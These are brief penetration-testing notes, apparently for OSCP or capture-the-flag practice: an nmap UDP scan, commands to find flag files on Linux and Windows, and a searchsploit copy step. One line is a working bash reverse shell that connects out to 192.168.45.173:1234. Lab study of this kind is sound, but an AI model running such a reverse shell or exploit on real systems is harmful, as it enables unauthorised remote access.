UDP SCANNING:

nmap -sU -sV --version-intensity 0 -F -n 192.168.180.145

FINDING FILE FROM ANYWHERE IN DIRETORY:

• Linux—>find / -name "flag.txt" 2>/dev/null /var/www/flag.txt

  find / -name "root.txt" 2>/dev/null

• Windows—> dir \local.txt /s /p

   type C:\\inetpub\\wwwroot\\flag.txt
  

• Copying a exploit from searchsploit to current location

  searchsploit -m windows/remote/48537.py

• Using bash to run reverse from /usr/bin/bash

/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.173/1234 0>&1'

• python3 -c "print('0' * 32)"

find / -name "proof.txt" 2>/dev/null

https://mqt.gitbook.io/oscp-notes/ssh-keys?source=post_page-----9c7f5b963559--------------------------------

Global search for flags:

For windows, I start with: dir /A-D /S /B | findstr /i "\proof.txt \local.txt"